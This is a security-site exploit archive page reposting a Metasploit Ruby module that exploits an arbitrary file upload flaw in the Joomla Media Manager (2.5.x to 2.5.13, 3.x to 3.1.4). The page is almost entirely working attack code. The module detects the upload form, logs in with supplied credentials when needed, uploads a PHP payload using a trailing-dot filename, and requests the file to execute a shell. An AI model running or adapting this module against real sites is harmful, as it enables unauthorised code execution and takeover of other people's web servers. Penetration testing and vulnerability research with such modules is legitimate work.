首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Joomla Media Manager File Upload Vulnerability
来源:metasploit.com 作者:Hinrichsen 发布时间:2013-08-15  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::FileDropper

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Joomla Media Manager File Upload Vulnerability",
			'Description'    => %q{
				This module exploits a vulnerability found in Joomla 2.5.x up to 2.5.13, as well as
				3.x up to 3.1.4 versions. The vulnerability exists in the Media Manager component,
				which comes by default in Joomla, allowing arbitrary file uploads, and results in
				arbitrary code execution. The module has been tested successfully on Joomla 2.5.13
				and 3.1.4 on Ubuntu 10.04. Note: If public access isn't allowed to the Media
				Manager, you will need to supply a valid username and password (Editor role or
				higher) in order to work properly.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Jens Hinrichsen', # Vulnerability discovery according to the OSVDB
					'juan vazquez' # Metasploit module
				],
			'References'     =>
				[
					[ 'OSVDB', '95933' ],
					[ 'URL', 'http://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads' ],
					[ 'URL', 'http://www.cso.com.au/article/523528/joomla_patches_file_manager_vulnerability_responsible_hijacked_websites/' ],
					[ 'URL', 'https://github.com/joomla/joomla-cms/commit/fa5645208eefd70f521cd2e4d53d5378622133d8' ],
					[ 'URL', 'http://niiconsulting.com/checkmate/2013/08/critical-joomla-file-upload-vulnerability/' ]
				],
			'Payload'        =>
				{
					'DisableNops' => true,
					# Arbitrary big number. The payload gets sent as POST data, so
					# really it's unlimited
					'Space'       => 262144, # 256k
				},
			'Platform'       => ['php'],
			'Arch'           => ARCH_PHP,
			'Targets'        =>
				[
					[ 'Joomla 2.5.x <=2.5.13', {} ]
				],
			'Privileged'     => false,
			'DisclosureDate' => "Aug 01 2013",
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']),
					OptString.new('USERNAME', [false, 'User to login with', '']),
					OptString.new('PASSWORD', [false, 'Password to login with', '']),
				], self.class)

	end

	def peer
		return "#{rhost}:#{rport}"
	end

	def check
		res = get_upload_form

		if res and res.code == 200
			if res.body =~ /You are not authorised to view this resource/
				print_status("#{peer} - Joomla Media Manager Found but authentication required")
				return Exploit::CheckCode::Detected
			elsif res.body =~ /<form action="(.*)" id="uploadForm"/
				print_status("#{peer} - Joomla Media Manager Found and authentication isn't required")
				return Exploit::CheckCode::Detected
			end
		end

		return Exploit::CheckCode::Safe
	end

	def upload(upload_uri)
		begin
			u = URI(upload_uri)
		rescue ::URI::InvalidURIError
			fail_with(Exploit::Failure::Unknown, "Unable to get the upload_uri correctly")
		end

		data = Rex::MIME::Message.new
		data.add_part(payload.encoded, "application/x-php", nil, "form-data; name=\"Filedata[]\"; filename=\"#{@upload_name}.\"")
		post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

		res = send_request_cgi({
			'method'   => 'POST',
			'uri'      => "#{u.path}?#{u.query}",
			'ctype'    => "multipart/form-data; boundary=#{data.bound}",
			'cookie'   => @cookies,
			'vars_get' => {
				'asset'  => 'com_content',
				'author' => '',
				'format' => '',
				'view'   => 'images',
				'folder' => ''
			},
			'data'     => post_data
		})

		return res

	end

	def get_upload_form
		res = send_request_cgi({
			'method'   => 'GET',
			'uri'      => normalize_uri(target_uri.path, "index.php"),
			'cookie'   => @cookies,
			'encode_params' => false,
			'vars_get' => {
				'option' => 'com_media',
				'view'   => 'images',
				'tmpl'   => 'component',
				'e_name' => 'jform_articletext',
				'asset'  =>  'com_content',
				'author' => ''
			}
		})

		return res
	end

	def get_login_form

		res = send_request_cgi({
			'method'   => 'GET',
			'uri'      => normalize_uri(target_uri.path, "index.php", "component", "users", "/"),
			'cookie'   => @cookies,
			'vars_get' => {
				'view' => 'login'
			}
		})

		return res

	end

	def login
		res = send_request_cgi({
			'method'   => 'POST',
			'uri'      => normalize_uri(target_uri.path, "index.php", "component", "users", "/"),
			'cookie'   => @cookies,
			'vars_get' => {
				'task' => 'user.login'
			},
			'vars_post' => {
				'username' => @username,
				'password' => @password
				}.merge(@login_options)
			})

		return res
	end

	def parse_login_options(html)
		html.scan(/<input type="hidden" name="(.*)" value="(.*)" \/>/) {|option|
			@login_options[option[0]] = option[1] if option[1] == "1" # Searching for the Token Parameter, which always has value "1"
		}
	end

	def exploit
		@login_options = {}
		@cookies = ""
		@upload_name = "#{rand_text_alpha(rand(5) + 3)}.php"
		@username = datastore['USERNAME']
		@password = datastore['PASSWORD']

		print_status("#{peer} - Checking Access to Media Component...")
		res = get_upload_form

		if res and res.code == 200 and res.headers['Set-Cookie'] and res.body =~ /You are not authorised to view this resource/
			print_status("#{peer} - Authentication required... Proceeding...")

			if @username.empty? or @password.empty?
				fail_with(Exploit::Failure::BadConfig, "#{peer} - Authentication is required to access the Media Manager Component, please provide credentials")
			end
			@cookies = res.get_cookies.sub(/;$/, "")

			print_status("#{peer} - Accessing the Login Form...")
			res = get_login_form
			if res.nil? or res.code != 200 or res.body !~ /login/
				fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to Access the Login Form")
			end
			parse_login_options(res.body)

			res = login
			if not res or res.code != 303
				fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to Authenticate")
			end
		elsif res and res.code ==200 and res.headers['Set-Cookie'] and res.body =~ /<form action="(.*)" id="uploadForm"/
			print_status("#{peer} - Authentication isn't required.... Proceeding...")
			@cookies = res.get_cookies.sub(/;$/, "")
		else
			fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Failed to Access the Media Manager Component")
		end

		print_status("#{peer} - Accessing the Upload Form...")
		res = get_upload_form

		if res and res.code == 200 and res.body =~ /<form action="(.*)" id="uploadForm"/
			upload_uri = Rex::Text.html_decode($1)
		else
			fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to Access the Upload Form")
		end

		print_status("#{peer} - Uploading shell...")

		res = upload(upload_uri)

		if res.nil? or res.code != 200
			fail_with(Exploit::Failure::Unknown, "#{peer} - Upload failed")
		end

		register_files_for_cleanup("#{@upload_name}.")
		print_status("#{peer} - Executing shell...")
		send_request_cgi({
			'method'   => 'GET',
			'uri'      => normalize_uri(target_uri.path, "images", @upload_name),
		})

	end

end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MinaliC Webserver 2.0.0 - Buff
·Chasys Draw IES Buffer Overflo
·onehttpd 0.7 - Denial of Servi
·Ultra Mini HTTPD Stack Buffer
·HP StorageWorks P4000 Virtual
·MiniWeb (Build 300) Arbitrary
·Open-FTPD 1.2 Arbitrary File U
·Intrasrv 1.0 Buffer Overflow
·Jetaudio 8.0.17 Crash Proof Of
·Java storeImageArray() Invalid
·Sami FTP Server 2.0.1 - MKD Bu
·Cisco WebEx One-Click Client P
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved